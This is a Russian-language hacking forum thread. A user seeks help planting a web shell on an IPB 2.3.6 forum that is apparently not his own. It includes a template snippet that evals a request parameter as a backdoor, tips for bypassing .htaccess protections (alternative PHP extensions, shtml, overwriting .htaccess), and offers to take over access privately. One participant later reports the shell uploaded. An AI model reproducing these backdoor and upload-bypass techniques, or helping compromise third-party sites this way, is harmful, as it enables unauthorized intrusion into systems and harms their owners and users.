Форумы Помогите с заливкой шелла на IPB

Discussion in 'Уязвимости CMS/форумов' started by nikonic, 10 Jun 2015.

  1. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    Есть форум на ipb 2.3.6,пробовал такие способы заливки,через sql не идет(нет привилегий),через аватарку при помощи прикрепленных файлов открывает как текст,при добавлении настройки с выполнением пхп кода шелл грузиться но открывается как текст,прошу помочь с загрузкой и объясните как залить через смайлы или шаблон.
    _____________________________________
    Code:
    Директория или файл /local/www/форум/style_images недоступны для записи
    Директория или файл /local/www/форум/style_emoticons недоступны для записи
    /local/www/форум/cache доступен для записи
    Директория или файл /local/www/форум/cache/skin_cache недоступны для записи
    Директория или файл /local/www/форум/cache/lang_cache недоступны для записи
    /local/www/форум/uploads доступен для записи
    
    ____________________________________
    при добавлении кода в шаблон
    Code:
    <if="$this->ipsclass->input['testKey'] = 123">
    <if="eval($this->ipsclass->input['code'])"></if>
    </if>
    происходит такая ошибка(
    Невозможно произвести запись в файл кеша cache/skin_cache/cacheid_3
    Шаблон(ы) в базе данных обновлен(ы)
     
    #1 nikonic, 10 Jun 2015
    Last edited: 10 Jun 2015
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    код-то можете исполнить? открывается как текст, потому что htaccess. ищите другую папку на запись или удалите htaccess (только именно тот, который открывает php как plain text)
     
    _________________________
  3. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    пхп код выполняется,как можно удалить .htaccess,он именно в папке например uploads или может из корня все блочить?
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    попробуйте phtml, pht, php3, php4, php5
     
    _________________________
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    если есть mod_include то можно посмотреть в сторону shtml (при условии что аватарки или что там не в БД, а как реальные файлы)
     
  6. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    ничего не помогло,открывает как текст
     
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    А вы попробуйте с помощью того же кода записаться в файл .htaccess, тем самым изменить его. пару раз помогало
     
  8. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    вот еще какой прикол
    заливал шелл в uploads,открывает как тест,но когда зашел в центр безопасности...
    Code:
    Защита файлом «.htaccess»
    IPB может записать файл «.htaccess» в директории, где не содержатся php-файлы, препятствуя тем самым запуску файлов PHP и CGI в этих директориях.
    IPB не обнаружил какие-либо «.htaccess» файлы.
    
    то есть где он может быть?один в корне?
     
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Можешь в личку скинуть? Поссмотрю
     
  10. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    В личку доступ, залью.
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    шелл залил, но там почти нет прав
     
    _________________________
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Есть права. Не так просто надо было делать.
     
    _________________________
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    ?
     
    _________________________
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Узрите ПМ, сударь
     
    _________________________
Loading...